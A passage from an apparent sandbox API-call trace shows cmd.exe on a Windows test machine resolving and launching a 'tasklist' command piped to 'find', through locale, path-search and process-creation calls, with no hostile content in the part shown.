FindClose (in: hFindFile=0x8942d8 | out: hFindFile=0x8942d8) returned 1 [0075.345] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0075.345] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x4ff700 | out: lpFindFileData=0x4ff700) returned 0x8942d8 [0075.345] FindClose (in: hFindFile=0x8942d8 | out: hFindFile=0x8942d8) returned 1 [0075.346] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0075.346] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0075.346] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0075.346] GetEnvironmentStringsW () returned 0x896190* [0075.346] FreeEnvironmentStringsA (penv="=") returned 1 [0075.346] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0075.346] GetConsoleOutputCP () returned 0x1b5 [0075.346] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0075.346] GetUserDefaultLCID () returned 0x409 [0075.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0075.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4ffab0, cchData=128 | out: lpLCData="0") returned 2 [0075.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4ffab0, cchData=128 | out: lpLCData="0") returned 2 [0075.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4ffab0, cchData=128 | out: lpLCData="1") returned 2 [0075.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0075.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0075.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0075.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0075.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0075.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0075.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0075.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0075.347] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0075.347] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0075.347] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0075.348] GetConsoleTitleW (in: lpConsoleTitle=0x894e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0075.349] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0075.349] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0075.349] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0075.349] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0075.350] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0075.350] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0075.350] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0075.350] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0075.350] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0075.350] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0075.350] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0075.351] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0075.351] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0075.351] _wcsicmp (_String1="IF", _String2="find") returned 3 [0075.351] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0075.351] _wcsicmp (_String1="REM", _String2="find") returned 12 [0075.351] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0075.352] _pipe (in: _PtHandles=0x8951f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x8951f0) returned 0 [0075.352] _dup (_FileHandle=1) returned 5 [0075.352] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0075.352] _close (_FileHandle=4) returned 0 [0075.352] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0075.353] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0075.353] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0075.353] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0075.353] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0075.353] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0075.353] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0075.353] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0075.353] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0075.353] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0075.353] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0075.353] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0075.353] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0075.353] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0075.353] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0075.353] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0075.353] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0075.353] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0075.353] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0075.353] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0075.353] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0075.353] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0075.353] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0075.353] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0075.353] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0075.353] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0075.353] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0075.353] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0075.353] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0075.353] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0075.353] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0075.353] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0075.353] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0075.353] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0075.353] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0075.353] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0075.353] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0075.353] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0075.353] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0075.353] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0075.353] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0075.353] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0075.354] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0075.354] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0075.354] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0075.354] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0075.354] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0075.354] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0075.354] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0075.354] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0075.354] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0075.354] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0075.354] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0075.354] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0075.354] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0075.354] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0075.354] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0075.354] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0075.354] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0075.354] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0075.354] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0075.354] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0075.354] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0075.354] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0075.354] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0075.354] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0075.354] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0075.354] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0075.354] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0075.354] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0075.354] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0075.354] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0075.354] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0075.354] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0075.354] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0075.354] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0075.354] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0075.354] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0075.354] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0075.354] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0075.354] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0075.354] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0075.354] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0075.354] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0075.355] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0075.355] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0075.355] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0075.355] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0075.355] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0075.355] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0075.355] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0075.355] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0075.355] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0075.355] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0075.355] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0075.355] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0075.355] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0075.355] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0075.355] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0075.355] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0075.355] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0075.355] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0075.355] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0075.355] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0075.355] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0075.355] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0075.355] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0075.355] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0075.355] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0075.355] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0075.355] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0075.355] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0075.355] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0075.355] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0075.356] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0075.356] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0075.356] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0075.356] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0075.356] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0075.356] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0075.356] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0075.356] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0075.356] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0075.356] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0075.356] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0075.356] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0075.356] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0075.356] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0075.356] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0075.356] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0075.356] SetErrorMode (uMode=0x0) returned 0x0 [0075.356] SetErrorMode (uMode=0x1) returned 0x0 [0075.356] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x895228, lpFilePart=0x4ff90c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x4ff90c*="Desktop") returned 0x1c [0075.356] SetErrorMode (uMode=0x0) returned 0x1 [0075.357] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0075.357] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0075.362] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0075.362] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0075.362] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x4ff698, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff698) returned 0xffffffff [0075.363] GetLastError () returned 0x2 [0075.363] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0075.363] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x4ff698, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff698) returned 0x895530 [0075.363] FindClose (in: hFindFile=0x895530 | out: hFindFile=0x895530) returned 1 [0075.363] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x4ff698, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff698) returned 0xffffffff [0075.363] GetLastError () returned 0x2 [0075.363] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x4ff698, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff698) returned 0x895530 [0075.363] FindClose (in: hFindFile=0x895530 | out: hFindFile=0x895530) returned 1 [0075.363] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0075.363] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0075.364] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0075.364] SetErrorMode (uMode=0x0) returned 0x0 [0075.364] SetErrorMode (uMode=0x1) returned 0x0 [0075.364] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x89a3c0, lpFilePart=0x4ff6b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x4ff6b4*="Desktop") returned 0x1c [0075.364] SetErrorMode (uMode=0x0) returned 0x1 [0075.364] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0075.364] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0075.364] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0075.364] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0075.364] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x4ff440, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff440) returned 0xffffffff [0075.364] GetLastError () returned 0x2 [0075.364] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0075.364] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x4ff440, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff440) returned 0x895628 [0075.364] FindClose (in: hFindFile=0x895628 | out: hFindFile=0x895628) returned 1 [0075.365] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x4ff440, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff440) returned 0xffffffff [0075.365] GetLastError () returned 0x2 [0075.365] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x4ff440, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff440) returned 0x895628 [0075.365] FindClose (in: hFindFile=0x895628 | out: hFindFile=0x895628) returned 1 [0075.365] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0075.365] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0075.365] GetConsoleTitleW (in: lpConsoleTitle=0x4ff93c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0075.366] InitializeProcThreadAttributeList (in: lpAttributeList=0x4ff868, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4ff84c | out: lpAttributeList=0x4ff868, lpSize=0x4ff84c) returned 1 [0075.366] UpdateProcThreadAttribute (in: lpAttributeList=0x4ff868, dwFlags=0x0, Attribute=0x60001, lpValue=0x4ff854, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4ff868, lpPreviousValue=0x0) returned 1 [0075.367] GetStartupInfoW (in: lpStartupInfo=0x4ff8a0 | out: lpStartupInfo=0x4ff8a0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2a0, hStdError=0x2c)) [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0075.367] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0075.368] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0075.368] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0075.368] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0075.368] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0075.368] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0075.368] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0075.368] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0075.369] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x4ff7f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4ff83c | out: lpCommandLine="tasklist", lpProcessInformation=0x4ff83c*(hProcess=0x64, hThread=0x60, dwProcessId=0xacc, dwThreadId=0xabc)) returned 1 [0075.373] CloseHandle (hObject=0x60) returned 1 [0075.373] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0075.373] GetEnvironmentStringsW () returned 0x8942d8* [0075.374] FreeEnvironmentStringsA (penv="=") returned 1 [0075.374] DeleteProcThreadAttributeList (in: lpAttributeList=0x4ff868 | out: lpAttributeList=0x4ff868) [0075.374] _get_osfhandle (_FileHandle=3) returned 0x54 [0075.374] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0075.374] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0075.374] _close (_FileHandle=5) returned 0 [0075.374] _dup (_FileHandle=0) returned 4 [0075.374] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0075.374] _close (_FileHandle=3) returned 0 [0075.374] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0075.374] SetErrorMode (uMode=0x0) returned 0x0 [0075.374] SetErrorMode (uMode=0x1) returned 0x0 [0075.374] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x8942e0, lpFilePart=0x4ff90c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x4ff90c*="Desktop") returned 0x1c [0075.374] SetErrorMode (uMode=0x0) returned 0x1 [0075.374] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0075.374] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0075.375] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0075.375] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0075.375] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x4ff698, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff698) returned 0xffffffff [0075.375] GetLastError () returned 0x2 [0075.375] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0075.375] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x4ff698, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff698) returned 0x895628 [0075.375] FindClose (in: hFindFile=0x895628 | out: hFindFile=0x895628) returned 1 [0075.375] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, 